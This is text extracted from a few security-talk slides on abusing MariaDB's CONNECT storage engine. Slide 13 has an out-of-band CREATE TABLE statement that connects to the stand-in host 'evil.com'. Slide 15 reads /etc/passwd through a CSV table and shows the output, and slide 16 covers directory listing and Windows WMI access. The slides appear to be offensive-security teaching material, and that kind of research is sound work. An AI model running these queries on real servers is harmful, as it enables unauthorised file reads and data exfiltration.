  • 13. CONNECT storage engine OOB (MariaDB) ● Different storage engines: MEMORY, CSV, ... ● CONNECT storage engine (https://mariadb.com/kb/en/mariadb/connect-table- types-mysql-table-type-accessing-mysqlmariadb-tables/ https://mariadb. com/kb/en/mariadb/connect-security/) ● OOB through MYSQL and ODBC table_type ● CREATE TABLE t(id int) engine=CONNECT table_type=MYSQL connection='mysql://root@evil.com/database/table; The use of the CONNECT engine requires the FILE privilege for "outward" tables. This should not be an important restriction. The use of CONNECT "outward" tables on a remote server seems of limited interest without knowing the files existing on it and must be protected anyway. On the other hand, using it on the local client machine is not an issue because it is always possible to create locally a user with the FILE privilege.
  • 14. MariaDB CONNECT ENGINE file access All of these table types supports file_name argument: ● DOS ● DBF ● BIN ● CSV ● FMT ● XML (no XXE there, sorry :) ● JSON ● INI
  • 15. MariaDB CONNECT ENGINE file access MariaDB [test]> create table root(a varchar(1024)) engine=connect table_type=CSV file_name='/etc/passwd'; Query OK, 0 rows affected (0.00 sec) MariaDB [test]> select * from root; +-----------------------------------------------------------------------+ | a | +-----------------------------------------------------------------------+ | root:x:0:0:root:/root:/bin/bash | | bin:x:1:1:bin:/bin:/sbin/nologin | | daemon:x:2:2:daemon:/sbin:/sbin/nologin | | adm:x:3:4:adm:/var/adm:/sbin/nologin | | lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin | | sync:x:5:0:sync:/sbin:/bin/sync | +-----------------------------------------------------------------------+ 7 rows in set (0.01 sec)
  • 16. MariaDB CONNECT ENGINE piece of cheat https://mariadb.com/kb/en/mariadb/connect-table-types-special-virtual-tables/ … table_type=DIR file_name=’*.frm’ options=’subdir=1’ Also only for Windows: ● MAC (network adapter details) ● WMI (really)